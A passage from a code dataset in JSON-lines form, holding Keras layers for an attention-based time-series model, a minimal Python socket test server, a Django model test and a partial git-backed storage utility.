name='depthwiseConv1D_dilation_{}_1'.format(dilation_rate),\n padding=padding, activation=activation,\n depth_multiplier=depth_multiplier,\n depthwise_initializer=depthwise_initializer)\n self.conv1x1 = DepthwiseConv1D(\n 1, padding=padding,\n activation=tf.keras.activations.linear,\n depth_multiplier=depth_multiplier,\n kernel_initializer=tf.keras.initializers.GlorotUniform())\n self.depth_multiplier = depth_multiplier\n self.dilation_rate = dilation_rate\n\n def call(self, x):\n\n # get dimensions\n\n batch_size = tf.cast(tf.shape(x)[0], dtype=tf.int32)\n Tx = tf.cast(tf.shape(x)[1], dtype=tf.int32)\n\n # get residual\n\n \"\"\"\n For the case of depth_multiplier != 1:\n x before and after the convolution will have a different amount of\n channels. Thus, a 1x1 convolution is applied. 
This is relevant only\n for the first residual block with dilation_rate = 1.\n \"\"\"\n if self.dilation_rate == 1 and self.depth_multiplier > 1:\n n_features = tf.cast(tf.shape(x)[2], dtype=tf.int32)\n x_res = self.conv1x1(x)\n # shape == (batch, Tx, n_features*depth_multiplier)\n else:\n x_res = x # 1x1 Convolution not needed\n n_features = tf.cast(tf.shape(x)[2]/self.depth_multiplier,\n dtype=tf.int32)\n\n # apply first conv\n\n x = self.conv1(x) # shape == (batch, Tx, n_features*depth_multiplier)\n \"\"\"\n DepthwiseConv1D does not support having multiple channels per feature\n as input. Thus, the convolution is applied to x\n [batch, Tx, n features*channels] rather than\n [batch, Tx, n features, channels]. To compensate, the result of this\n convolution has to be reshaped after the convolution. This is not the\n case for the very first convolution, as the input is x\n [batch, Tx, n features].\n \"\"\"\n multi_channel = False\n # if not the first residual block, apply multi-channel computation in\n # first conv\n if self.dilation_rate > 1:\n multi_channel = True\n if multi_channel:\n x = tf.reshape(x, (batch_size, Tx, n_features,\n self.depth_multiplier, self.depth_multiplier))\n x = tf.reduce_sum(x, axis=-2)\n x = tf.reshape(x, (batch_size, Tx,\n n_features*self.depth_multiplier))\n multi_channel = True\n # apply activation\n x = tf.keras.activations.swish(x)\n x = self.dropout(x)\n\n # second convolution\n\n x = self.conv2(x)\n\n if multi_channel:\n x = tf.reshape(x, (batch_size, Tx, n_features,\n self.depth_multiplier, self.depth_multiplier))\n x = tf.reduce_sum(x, axis=-2)\n x = tf.reshape(x, (batch_size, Tx,\n n_features*self.depth_multiplier))\n # apply activation\n x = tf.keras.activations.swish(x)\n x = self.dropout(x)\n\n # residual connection\n\n out = x + x_res\n\n return out\n\n\nclass deal_with_tf_bug(Layer):\n \"\"\" If this layer is not used, tf will complain about the shapes not being known in the next layer and the model can\n only be fit if run_eagerly=True. Unfortunately, no other fix could be found. 
This layer applies some dummy\n computations that will not affect the output of the residual blocks.\n \"\"\"\n\n def __init__(self, Tx):\n super(deal_with_tf_bug, self).__init__()\n self.wa = Dense(Tx, trainable=False)\n self.wb = Dense(Tx, trainable=False)\n self.Tx = Tx\n\n def call(self, x):\n keys = self.wa(x)\n queries = self.wb(x)\n scores = keys * queries\n dk = tf.math.sqrt(tf.cast(self.Tx, dtype=tf.float32))\n scores = scores / dk\n att = tf.math.divide_no_nan(scores + 0.0000001, scores + 0.0000001)\n out = att * x\n\n return out\n\n\nclass MultiHeadAttention(Layer):\n \"\"\"\n Multi-Head-Attention as described in Attention is all you need (2017).\n\n Input shape:\n 3D Tensor with shape:\n [batch, n features, Tx]\n Output shape:\n out: 3D tensor of shape == (batch, n features, d_model)\n att_weights: attention weights of shape ==\n (batch, num_heads, n features, n features)\n values: values of shape == (batch, num_heads, n features,\n d_model, depth)\n \"\"\"\n\n def __init__(self, d_model, num_heads, regularization, p):\n super(MultiHeadAttention, self).__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n self.regularization = regularization\n self.p = p\n\n # assert that d_model can be split into equally sized heads\n assert self.d_model % self.num_heads == 0\n\n # depth of each head is d_model/num_heads\n # -> overall computational cost is the same\n self.depth = self.d_model // self.num_heads\n\n self.wq = TimeDistributed(Dense(\n d_model,\n kernel_initializer=tf.keras.initializers.GlorotUniform()))\n self.wk = TimeDistributed(Dense(\n d_model,\n kernel_initializer=tf.keras.initializers.GlorotUniform()))\n self.wv = TimeDistributed(Dense(\n d_model,\n kernel_initializer=tf.keras.initializers.GlorotUniform()))\n\n self.dense = TimeDistributed(Dense(\n d_model,\n kernel_initializer=tf.keras.initializers.GlorotUniform()))\n\n def split_heads(self, x, batch_size, n_features):\n \"\"\" Split the last dimension (d_model) into (num_heads, depth).\n Transpose to (batch, num_heads, features, depth).\n \"\"\"\n x = tf.reshape(x, (batch_size, n_features, self.num_heads, self.depth))\n\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def dropAttention(self, attention_weights, p):\n \"\"\"\n Regularization method for attention following the paper:\n https://arxiv.org/pdf/1907.11065.pdf\n With a probability of p a column of the attention weights is set to 0.\n This leads to a feature in the values v being ignored with a\n probability of p during training. 
An individual mask is generated for\n each sample in a batch, whereas the same mask is used across different\n heads.\n\n Args:\n attention weights: shape == (batch_size, num_heads, features,\n features)\n p: probability to set a column to 0\n\n Returns:\n attention_weights\n \"\"\"\n\n batch_size = tf.shape(attention_weights)[0]\n n_features = tf.shape(attention_weights)[-1]\n # create mask that sets columns to 0 with a certain probability\n # different mask for every sample in batch\n mask = tf.random.uniform(shape=(batch_size, n_features)) > p\n mask = tf.cast(mask, dtype='float32')\n mask = tf.reshape(mask, [batch_size, 1, 1, -1])\n # mask attention weights\n attention_weights = attention_weights*mask\n # normalized rescaling of attention_weights to ensure that attention\n # weights in every row sum up to 1\n # row vector a_j = a_j / sum(a_j)\n # add constant gamma to avoid 0-division\n gamma = tf.constant(1e-12, shape=(1, 1, 1), dtype='float32')\n sum_att = tf.reduce_sum(attention_weights, axis=-1) + gamma\n attention_weights = attention_weights / tf.expand_dims(sum_att,\n axis=-1)\n\n return attention_weights\n\n def scaled_dot_product_attention(self, q, k, v, regularization, p,\n training):\n \"\"\"\n Scaled-dot-product attention following Attention is all you need (2017)\n\n\n Args:\n q, k, v == (..., features, depth)\n regularization: 'dropout' or 'dropAttention', where 'dropout' does\n not affect scaled_dot_product_attention\n p: dropattention probability\n training: True for training, False at inference\n\n Returns:\n scaled_values, attention weights\n\n \"\"\"\n matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., features,\n # features)\n # scale with sqrt(d_model)\n dk = tf.cast(tf.shape(k)[-1], dtype='float32')\n scaled_matmul_qk = matmul_qk / tf.math.sqrt(dk)\n # compute attention weights along last axis so that attention weights\n # add up to 1\n attention_weights = tf.nn.softmax(scaled_matmul_qk, axis=-1)\n # (..., features, features)\n # apply dropattention if desired\n if regularization == 'dropAttention' and training:\n attention_weights = self.dropAttention(attention_weights, p)\n\n # scale values with attention weights\n scaled_values = tf.matmul(attention_weights, v)\n # shape == (batch, num_heads, n_features, depth)\n\n return scaled_values, attention_weights\n\n def call(self, q, k, v, training):\n batch_size = tf.shape(q)[0]\n n_features = tf.shape(q)[1]\n\n # compute queries, keys and values linear transformation\n q = self.wq(q) # (batch, features, d_model)\n k = self.wk(k) # (batch, features, d_model)\n v = self.wv(v) # (batch, features, d_model)\n # split heads\n q = self.split_heads(q, batch_size, n_features)\n # (batch, num_heads, features, depth)\n k = self.split_heads(k, batch_size, n_features)\n # (batch, num_heads, features, depth)\n v = self.split_heads(v, batch_size, n_features)\n # (batch, num_heads, features, depth)\n\n # compute attention\n # att_out == shape (batch_size, num_heads, depth)\n # att_weights == shape (batch_size, num_heads, features, features)\n\n att_out, att_weights = self.scaled_dot_product_attention(\n q, k, v,\n self.regularization, self.p, training)\n\n # concat attention outputs\n\n att_out = tf.transpose(att_out, perm=[0, 2, 1, 3])\n # shape == (batch, n_features, num_heads, depth)\n concat_att_out = tf.reshape(att_out, (batch_size,\n tf.shape(att_out)[1], self.d_model))\n # (batch, n_features, d_model)\n\n # apply linear projection to combine outputs of the different heads\n if self.num_heads > 1:\n concat_att_out = 
self.dense(concat_att_out)\n\n return concat_att_out, att_weights, v\n\n\nclass prediction_block(Layer):\n\n \"\"\" Block of a series of Conv1D\n\n Input shape:\n 3D Tensor with shape:\n [batch, Tx, n features]\n Output shape:\n 3D Tensor with shape:\n [batch, Tx, 1]\n \"\"\"\n def __init__(self, filters=8, kernel_size=2,\n activation=tf.keras.activations.swish,\n dilation_rates=[1, 2], dropout=0.1, padding='causal',\n kernel_initializer='he_uniform'):\n super(prediction_block, self).__init__()\n self.convs = []\n for dilation_rate in dilation_rates:\n self.convs.append(Conv1D(\n filters, kernel_size, padding=padding,\n data_format='channels_last', dilation_rate=dilation_rate,\n activation=activation,\n kernel_initializer=tf.keras.initializers.HeUniform()))\n self.out = Conv1D(\n 1, 1, padding='same', data_format='channels_last',\n kernel_initializer=tf.keras.initializers.GlorotUniform())\n self.dropout = Dropout(dropout)\n self.filters = filters\n\n def call(self, x):\n # Conv1D\n for conv in self.convs:\n x = conv(x)\n x = self.dropout(x)\n # 2D Convolution to merge channels\n out = self.out(x)\n\n return out\n\n\n@keras_export('keras.layers.DepthwiseConv1D')\nclass DepthwiseConv1D(Conv1D):\n \"\"\"Depthwise 1D convolution.\n Depthwise convolution consist of performing a depthwise convolution\n that acts separately on channels.\n Arguments:\n kernel_size: A single integer specifying the spatial\n dimensions of the filters.\n dilation_rate: A single integer specifying the dilation factor of the\n convolution.\n strides: A single integer specifying the strides of the convolution.\n Specifying any `stride` value != 1 is incompatible with specifying\n any `dilation_rate` value != 1.\n padding: One of `\"valid\"`, `\"same\"`, or `\"causal\"` (case-insensitive).\n `\"valid\"` means no padding. `\"same\"` results in padding evenly to\n the left/right or up/down of the input\n such that output has the same height/width dimension as the input.\n `\"causal\"` results in causal(dilated)\n convolutions, e.g. 
`output[t]` does not depend on `input[t+1:]`.\n depth_multiplier: The number of depthwise convolution output channels\n for each input channel.\n data_format: A string,\n one of \"channels_last\"(default) or \"channels_first\".\n [..., length, channels] or [..., channels, length]\n activation: Activation function to use.\n If nothing is specified, no activation is applied (a(x)=x)\n use_bias: Boolean, whether the layer uses a bias vector.\n depthwise_initializer: Initializer for the depthwise kernel matrix.\n bias_initializer: Initializer for the bias vector.\n depthwise regularizer: Regularizer function applied to depthwise the\n depthwise kernel matrix.\n bias_regularizer: Regularizer function applied to the bias vector\n activity_regularizer: Regularizer applied to the activation.\n depthwise_constraint: Constraint function applied to the depthwise\n kernel matrix.\n bias_constraint: Constraint function applied to the bias vector.\n Input shape:\n 3D Tensor with shape:\n `[batch, channels, length]` if data_format = \"channels_first\"\n or\n 3D Tensor with shape:\n `[batch, length, channels]` if data_format = \"channels_last\"\n Output shape:\n 3D Tensor with shape:\n `[batch, filters, new_length]` if data_format = \"channels_first\"\n or\n 3D Tensor with shape:\n `[batch, new_length, filters]` if data_format = \"channels_last\"\n\n \"\"\"\n\n def __init__(self,\n kernel_size,\n dilation_rate=1,\n strides=1,\n padding='causal',\n depth_multiplier=1,\n data_format='channels_last',\n activation=None,\n use_bias=True,\n depthwise_initializer='glorot_uniform',\n bias_initializer='zeros',\n depthwise_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n depthwise_constraint=None,\n bias_constraint=None,\n **kwargs):\n super(DepthwiseConv1D, self).__init__(\n filters=None,\n dilation_rate=dilation_rate,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n data_format=data_format,\n activation=activation,\n use_bias=use_bias,\n bias_regularizer=bias_regularizer,\n activity_regularizer=activity_regularizer,\n bias_constraint=bias_constraint,\n **kwargs)\n self.depth_multiplier = depth_multiplier\n self.depthwise_initializer = initializers.get(depthwise_initializer)\n self.depthwise_regularizer = regularizers.get(depthwise_regularizer)\n self.depthwise_constraint = constraints.get(depthwise_constraint)\n self.bias_initializer = initializers.get(bias_initializer)\n\n def build(self, input_shape):\n if len(input_shape) < 3:\n raise ValueError('Inputs to `DepthwiseConv1D` should have rank 3'\n 'Recieved input shape:', str(input_shape))\n input_shape = tensor_shape.TensorShape(input_shape)\n channel_axis = self._get_channel_axis()\n if input_shape.dims[channel_axis].value is None:\n raise ValueError('The channel dimension of the input to '\n '`DepthwiseConv1D` should be defined.'\n ' Found `None`.')\n input_dim = int(input_shape[channel_axis])\n depthwise_kernel_shape = (self.kernel_size[0],\n input_dim,\n self.depth_multiplier)\n\n self.depthwise_kernel = self.add_weight(\n shape=depthwise_kernel_shape,\n initializer=self.depthwise_initializer,\n name='depthwise_kernel',\n regularizer=self.depthwise_regularizer,\n constraint=self.depthwise_constraint)\n\n if self.use_bias:\n self.bias = self.add_weight(\n shape=(input_dim*self.depth_multiplier,),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n else:\n self.bias = None\n self.input_spec = InputSpec(ndim=3, axes={channel_axis: input_dim})\n 
self.built = True\n\n def call(self, inputs):\n # causal padding of inputs by left padding along the sequence axis\n if self.padding == 'causal':\n inputs = tf.pad(inputs, self._compute_causal_padding(inputs))\n if self.data_format == 'channels_last':\n strides = (1,) + self.strides * 2 + (1,)\n spatial_start_dim = 1\n else:\n strides = (1, 1) + self.strides * 2\n spatial_start_dim = 2\n\n # Explicitly broadcast inputs and kernels to 4D.\n inputs = array_ops.expand_dims(inputs, spatial_start_dim)\n depthwise_kernel = array_ops.expand_dims(self.depthwise_kernel, 0)\n dilation_rate = (1,) + self.dilation_rate\n\n if self.padding == 'causal':\n op_padding = 'valid'\n else:\n op_padding = self.padding\n\n # Compute depthwiseConv2D on broadcasted inputs\n outputs = nn.depthwise_conv2d(\n inputs,\n depthwise_kernel,\n strides=strides,\n padding=op_padding.upper(),\n dilations=dilation_rate,\n data_format=conv_utils.convert_data_format(self.data_format,\n ndim=4))\n\n if self.use_bias:\n outputs = nn.bias_add(\n outputs,\n self.bias,\n data_format=conv_utils.convert_data_format(self.data_format,\n ndim=4))\n\n outputs = array_ops.squeeze(outputs, [spatial_start_dim])\n\n if self.activation is not None:\n return self.activation(outputs)\n\n return outputs\n\n @tf_utils.shape_type_conversion\n def compute_output_shape(self, input_shape):\n if self.data_format == 'channels_first':\n length = input_shape[2]\n out_filters = input_shape[1] * self.depth_multiplier\n elif self.data_format == 'channels_last':\n length = input_shape[1]\n out_filters = input_shape[2] * self.depth_multiplier\n\n # length = conv_utils.conv_output_length(length, self.kernel_size,\n # self.padding,\n # self.strides)\n if self.data_format == 'channels_first':\n return (input_shape[0], out_filters, length)\n elif self.data_format == 'channels_last':\n return (input_shape[0], length, out_filters)\n\n\n# Interpretable NN class\n\nclass TFAN(tf.keras.Model):\n \"\"\"\n Arguments:\n\n residual_blocks: integer specifying the amount of residual blocks\n residual_dropout: float, sepcifying the dropout rate in the residual\n blocks.\n activation: Activation to use for depthwise convolutions and all final\n convolutions but the last (linear).\n depthwise_padding: padding style used for Depthwise 1D Convolutions:\n one of \"valid\", \"same\", \"causal\"\n depthwise_kernel_size: Integer specifying depthwise kernel size.\n depth_multiplier: Integer, specifying the amount of filter per channel in\n the depthwise convolutions.\n Tx: Integer specifying amount of time-steps per feature in input data.\n kernel_initializer: Weight initializer used in residual block and final\n convolutions\n num_heads: Integer specifiyng the amount of heads in Multi-Head-Attention.\n d_model: Dimensionality of attention mechanism in Multi-Head-Attention.\n regularization: A string, being one of \"dropout\" or \"dropAttention\"\n p: A float, between [0,1] specifiying the regularization probability for\n the method specified in \"regularization\".\n final_filters: Integer specifying the amount of output channels in the\n prediction block Conv1D.\n final_kernel_size: Integer specifying the kernel size of the 1d-Convolution\n in the prediction block.\n final_dilations: List of dilations, where one Conv1D layer will be\n initialised per entry in list.\n final_padding: padding style used for final 1D Convolutions: one of\n \"valid\", \"same\", \"causal\"\n final_dropout: float, sepcifying the dropout rate in the prediction block.\n\n Input shape:\n x: 3D tensor of shape 
== (batch, Tx, n features)\n Outputs shape:\n out: 3D tensor of shape == (batch, Tx, 1) target time series\n att_weights: attention weights of MHA of shape == (batch, num_heads,\n n features,\n n features)\n values: values of MHA of shape == (batch, num_heads, n features,\n d_model(num_heads))\n\n \"\"\"\n def __init__(self, residual_blocks=4, residual_dropout=0.2,\n activation=tf.keras.activations.swish,\n depthwise_padding=\"causal\", depthwise_kernel_size=2,\n depth_multiplier=1, Tx=20,\n kernel_initializer=tf.keras.initializers.HeUniform(),\n num_heads=8, d_model=32,\n regularization=\"dropout\", p=0.25,\n final_filters=8, final_kernel_size=2,\n final_dilations=[1, 2], final_padding='causal',\n final_dropout=0.2):\n super(TFAN, self).__init__()\n\n # Residual Blocks\n self.res_blocks = []\n for dilation in range(residual_blocks):\n self.res_blocks.append(residual_block(\n depthwise_kernel_size,\n dilation_rate=dilation + 1,\n padding=depthwise_padding, activation=activation,\n dropout=residual_dropout,\n depth_multiplier=depth_multiplier,\n depthwise_initializer=kernel_initializer,\n name='residual_block_{}'.format(dilation)))\n self.depth_multiplier = depth_multiplier\n # deal with tf bug -> see layer\n self.deal_with_tf_bug = deal_with_tf_bug(Tx)\n # Merging of depthwise channels\n merge_channels_trainable = (depth_multiplier > 1)\n self.merge_channels = DepthwiseConv1D(\n 1, dilation_rate=1,\n data_format='channels_last', name='merge_channels',\n padding='same', activation='linear', depth_multiplier=1,\n depthwise_initializer='glorot_uniform', trainable=merge_channels_trainable)\n # MHA\n self.mha = MultiHeadAttention(d_model, num_heads, regularization, p)\n # Final Convolutions\n self.pred_block = prediction_block(\n filters=final_filters,\n kernel_size=final_kernel_size,\n activation=activation, dilation_rates=final_dilations,\n dropout=final_dropout, padding=final_padding,\n kernel_initializer=kernel_initializer)\n\n def call(self, x, training=None):\n\n # residual blocks\n for block in self.res_blocks:\n x = block(x)\n # x of shape == (batch, Tx, n features*depth_multiplier)\n\n # merge channels if necessary\n if self.depth_multiplier > 1:\n x = self.merge_channels(x)\n x = tf.reshape(x, (tf.shape(x)[0], tf.shape(x)[1],\n int(tf.shape(x)[-1] / self.depth_multiplier),\n self.depth_multiplier))\n x = tf.reduce_sum(x, axis=-1)\n # x of shape == (batch, Tx, n features)\n\n # transpose to shape required by mha\n x = tf.transpose(x, perm=[0, 2, 1])\n # x of shape == (batch, n features, Tx)\n\n # apply dummy layer to deal with tensorflow bug\n # this layer will not impact x\n # it is just necessary for tf to catch up on the shapes, this will prevent a value error in mha\n x = self.deal_with_tf_bug(x)\n\n # MHA\n x, att, val = self.mha(x, x, x, training)\n\n # x of shape == (batch, n features, d_model)\n # att of shape == (batch, num_heads, n features, n features)\n # val of shape == (batch, num_heads, n features, depth)\n\n # transpose\n x = tf.transpose(x, perm=[0, 2, 1])\n # x of shape == (batch, Tx, n features)\n\n # Prediction\n out = self.pred_block(x) # shape == (batch, Tx, 1)\n\n return out, att, val\n\n # override train step to only pass \"out\" to loss and ignore\n # attention weights and values\n\n def train_step(self, data):\n x, y = data\n with tf.GradientTape() as tape:\n # forward pass\n y_pred, _, _ = self(x, training=True)\n # Compute the loss\n loss = self.compiled_loss(y, y_pred,\n regularization_losses=self.losses)\n\n # Compute gradients\n trainable_vars = 
self.trainable_variables\n        gradients = tape.gradient(loss, trainable_vars)\n        # Update weights\n        self.optimizer.apply_gradients(zip(gradients, trainable_vars))\n        # Update metrics (includes the metric that tracks the loss)\n        self.compiled_metrics.update_state(y, y_pred)\n\n        return {m.name: m.result() for m in self.metrics}\n","sub_path":"TFAN/tfan_layers.py","file_name":"tfan_layers.py","file_ext":"py","file_size_in_byte":29078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21195655","text":"#!/usr/bin/python\n# -*- coding:UTF-8 -*-\nimport socket\n\ns=socket.socket()\nhost = socket.gethostname() # get the host name\nport = 12345                # set the port\ns.bind((host,port))         # attach the port to the host\ns.listen(5)                 # waiting for the connection\n\nwhile True:\n    c,addr = s.accept()     # setup the connection\n    print(\"connection location:\", addr)\n    c.send(\"test success!\".encode())  # encode so this also works on Python 3\n    c.close()               # shutdown the connection\n","sub_path":"iot/learning/test/1server_test.py","file_name":"1server_test.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"109580996","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom .models import CoffeHouse\n\n# Create your tests here.\n\n\nclass BlogTests(TestCase):\n\n    @classmethod\n    def setUpTestData(cls):\n        test_user = get_user_model().objects.create_user(\n            username='testuser', password='password')\n        test_user.save()\n\n        test_post = CoffeHouse.objects.create(\n            cheff=test_user,\n            drink='coffee',\n            description='Hot drink with amazing kinds'\n        )\n        test_post.save()\n\n    def test_blog_content(self):\n        post = CoffeHouse.objects.get(id=1)\n        actual_cheff = str(post.cheff)\n        actual_drink = str(post.drink)\n        actual_description = str(post.description)\n        self.assertEqual(actual_cheff, 'testuser')\n        self.assertEqual(actual_drink, 'coffee')\n        self.assertEqual(\n            actual_description, 'Hot drink with amazing kinds')\n","sub_path":"coffehouseapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114086602","text":"from .GitRepo import default_remote_location,GitRepo,is_git_dir\nfrom wk import Folder,copy_file,copy_dir,copy_fsitem,remove_fsitem,is_empty_dir\nfrom wk.basic import T,TMetaClass,CONST_TYPE\nimport os,shutil,glob,uuid,random\nfrom .utils import generate_hash\n_T=CONST_TYPE\nclass CONST(metaclass=TMetaClass):\n    remote_branch_list=_T()\n    master=_T()\n    empty=_T()\n\n# TODO: improve performance\n\n\n_BRANCH_LIST='remote_branch_list'\nUSER_HOME=os.path.expanduser('~')\nSTORE_HOME=USER_HOME+'/.store'\nBRANCH_LIST_DIR=STORE_HOME+'/BranchLists'\n\n\ndef get_default_path(remote_location,remote_branch):\n    name = generate_hash(remote_location + '/' + remote_branch)\n    path = BRANCH_LIST_DIR + '/' + name\n    return path\n\ndef get_default_remote_branch_list(remote_location):\n    bd=RemoteBranchList(remote_location=remote_location)\n    return bd\n\nclass StoreItem(Folder):\n    '''\n    issue: Branch name has a limit\n    '''\n    delimiter='.-.'\n    special_branches = ['master', 'empty', 'remote_branch_list']\n    legal_path_chars = [str(i) for i in range(10)]+[chr(i) for i in range(65, 91)]+[chr(i) for i in range(97, 123)]+list('._-')\n    def status(self,repo=None):\n        repo=repo or self.repo\n        from wk.basic import PointDict\n        info=PointDict(\n            current_branch=repo.active_branch(),\n            
local_branches=repo.branch_list(),\n status=repo.status()\n )\n print(info)\n return info\n def __init__(self,path,remote_location=None,remote_branch=None,is_remote_branch_list=False):\n remote_location = remote_location or default_remote_location\n assert remote_branch\n if not os.path.exists(path):\n os.makedirs(path)\n path=os.path.abspath(path)\n Folder.__init__(self,path)\n if is_git_dir(path):\n repo=GitRepo(path)\n else:\n repo=GitRepo.init(path)\n self.repo=repo\n self.path=path\n self.remote_location=remote_location or default_remote_location\n self.remote_branch=remote_branch\n self.data_list=['.git','.type.store'] # clean except\n self.info_list=['.git','.type.store','.more.store'] # copy except\n self.typefile=self.openFiledict('.type.store')\n self.is_remote_branch_list = is_remote_branch_list\n self.init_branches()\n if not is_remote_branch_list:\n self.rbl=get_default_remote_branch_list(remote_location=self.remote_location)\n print(\"Init StoreFolder finished.\")\n def _try_pull_remote(self):\n try:\n self._pull_remote()\n except:\n import logging\n logging.warning(\"Can't pull remote branch %s , maybe because local branch has already been updates.\"%(self.remote_branch))\n def _pull_remote(self):\n repo=self.repo\n repo.pull(self.remote_location,self.remote_branch)\n def _push_self(self):\n repo=self.repo\n repo.add_all()\n repo.commit()\n repo.push(self.remote_location,self.remote_branch)\n def _push_if_not_exists(self):\n if not self.rbl.branch_exists(self.remote_branch):\n self._push_self()\n self.rbl.branch_add(self.remote_branch)\n def _pull_else_push_self(self):\n remote_branch=self.remote_branch\n if not self.rbl.exists(remote_branch):\n self._push_self()\n else:\n self._try_pull_remote()\n\n\n # def _pull_remote_branch_list(self,repo=None,remote_location=None,remote_branch='remote_branch_list',hard=False):\n # repo=repo or self.repo\n # remote_location=remote_location or self.remote_location\n # pull=False\n # if not 'remote_branch_list' in repo.branch_list():\n # repo.branch_create('remote_branch_list')\n # pull=True\n # if hard:\n # pull=True\n # if pull:\n # try:\n # br = repo.active_branch()\n # repo.checkout_branch('remote_branch_list')\n # repo.clean()\n # repo.add_all()\n # repo.commit()\n # repo.pull(remote_location, branch=remote_branch)\n # repo.checkout_branch(br)\n # except:\n # print(\"Can't pull remote_branch_list, maybe because local branch is already updated.\")\n\n def init_branches(self,repo=None):\n '''\n A store repo has 3 branches: master , empty , remote_branch_list, remote_branch\n '''\n repo=repo or self.repo\n if not repo.branch_list():\n repo.commit() # create master\n if not 'empty' in repo.branch_list():\n repo.branch_create('empty')\n repo.checkout_branch('empty')\n repo.clean()\n repo.commit()\n repo.checkout_branch('master')\n if not self.remote_branch in repo.branch_list():\n repo.branch_create(self.remote_branch)\n repo.checkout_branch(self.remote_branch)\n repo.clean()\n repo.commit()\n repo.checkout_branch('master')\n repo.checkout_branch(self.remote_branch)\n\n # def _read_remote_branch_list(self,pull=False):\n # repo=self.repo\n # br = repo.active_branch()\n # repo.checkout_branch(CONST.remote_branch_list)\n # if pull:\n # self._pull_remote_branch_list(repo)\n # lf = self.openSimpleListfile(CONST.remote_branch_list)\n # li = lf.read()\n # repo.checkout_branch(br)\n # return li\n # def _add_to_remote_branch_list(self,branch):\n # repo=self.repo\n # br=repo.active_branch()\n # self._pull_remote_branch_list(hard=True)\n # 
repo.checkout_branch(CONST.remote_branch_list)\n # # repo.pull(self.remote_location,CONST.remote_branch_list)\n # lf=self.openSimpleListfile(CONST.remote_branch_list)\n # li=lf.read()\n # # print(\"original:\",li)\n # li.append(branch)\n # li=list(set(li))\n # # print(\"now:\",li)\n # lf.write(li)\n # repo.add_all()\n # repo.commit()\n # repo.push(self.remote_location,CONST.remote_branch_list)\n # repo.checkout_branch(br)\n def iter_contentpath(self):\n lis=[]\n for name in self.listdir():\n if name in self.info_list:\n continue\n else:\n path=self.path+'/'+name\n lis.append(path)\n return lis\n def set_type(self,type):\n self.typefile.type=type\n return type\n def get_type(self):\n if not self.typefile.get('type'):\n return None\n return self.typefile.type\n @classmethod\n def pull(cls,remote_location=None,remote_branch=None,path=None,overwrite=False):\n remote_location=remote_location or default_remote_location\n remote_branch=remote_branch or 'master'\n if os.path.exists(path) and len(os.listdir(path)):\n if overwrite:\n shutil.rmtree(path)\n else:\n raise FileExistsError(\"Can't pull because folder %s is not empty.\"%(path))\n if not os.path.exists(path):\n os.makedirs(path)\n repo=GitRepo.init(path)\n if not repo.branch_list():\n repo.add_all()\n repo.commit()\n if not remote_branch in repo.branch_list():\n repo.branch_create(remote_branch)\n repo.checkout_branch(remote_branch)\n repo.clean()\n repo.pull(remote_location,branch=remote_branch)\n item=cls(repo.path,remote_location=remote_location,remote_branch=remote_branch)\n type=item.get_type()\n if not type:\n type=item.set_type(T.FOLDER)\n import logging\n logging.warning('StoreItem %s has no type, so we set it as %s'%(item.path,type))\n if type==T.FOLDER:\n return StoreFolder(repo.path,remote_location=remote_location,remote_branch=remote_branch)\n else:\n assert type==T.FILE\n return StoreFile(repo.path,remote_location=remote_location,remote_branch=remote_branch)\n @classmethod\n def openStorefolder(cls,path,remote_location=None,remote_branch=None,force_pull=False,overwrite=False):\n remote_location=remote_location or default_remote_location\n if not is_git_dir(path):\n force_pull=True\n if not force_pull:\n item=StoreFolder(path,remote_location=remote_location,remote_branch=remote_branch)\n else:\n item=StoreFolder.pull(remote_location=remote_location,remote_branch=remote_branch,path=path,overwrite=overwrite)\n return item\n @classmethod\n def openStorefile(cls,path,remote_location=None,remote_branch=None,force_pull=False,overwrite=False):\n remote_location=remote_location or default_remote_location\n if not is_git_dir(path):\n force_pull=True\n if not force_pull:\n item=StoreFile(path,remote_location=remote_location,remote_branch=remote_branch)\n else:\n item=StoreFile.pull(remote_location=remote_location,remote_branch=remote_branch,path=path,overwrite=overwrite)\n return item\n def upload(self,remote_location=None,remote_branch=None,overwrite=True):\n # Todo:get remote branch list\n # deprecated !!!\n\n remote_loacation=remote_location or self.remote_location\n remote_branch=remote_branch or self.remote_branch\n assert remote_loacation and remote_branch\n assert remote_branch !='master'\n repo=self.repo\n repo.add_all()\n repo.commit()\n # br=repo.active_branch()\n if not remote_branch in repo.branch_list():\n repo.branch_create(remote_branch)\n repo.checkout_branch(remote_branch)\n\n repo.push(remote_loacation,remote_branch)\n # print(\"list:\", self.listdir())\n # repo.checkout_branch(br)\n 
self.rbl.branch_add_if_not_exists(remote_branch)\n @classmethod\n def export(cls,path,remote_branch,remote_location=default_remote_location,name=None,cache_dir='.tmp',overwrite=False):\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n def _export_dir(obj,path,cache_dir):\n for p in obj.iter_contentpath():\n copy_fsitem(p, path)\n more = obj.morefile.copy()\n # obj.rmself()\n for nm, br in more.items():\n br_cache_dir=cache_dir+'/'+br\n cls.export(path, remote_location=remote_location, remote_branch=br, name=nm, cache_dir=br_cache_dir,overwrite=overwrite)\n this_dir=cache_dir+'/.this'\n obj=StoreItem.pull(remote_location=remote_location,remote_branch=remote_branch,path=this_dir)\n # print(obj.path)\n # print(\"list:\", obj.morefile)\n # print(\"list:\", obj.listdir())\n # input()\n\n if isinstance(obj,StoreFolder):\n if not os.path.exists(path):\n os.makedirs(path)\n assert os.path.isdir(path)\n name = name or remote_branch.split(cls.delimiter)[-1]\n path=path+'/'+name\n if os.path.exists(path):\n if overwrite:\n shutil.rmtree(path)\n else:\n raise Exception(\"Can't export to %s because path already existed and overwrite is not True\")\n os.mkdir(path)\n _export_dir(obj,path,cache_dir)\n else:\n assert isinstance(obj,StoreFile)\n if os.path.exists(path):\n assert os.path.isdir(path)\n if name:\n path=path+'/'+name\n 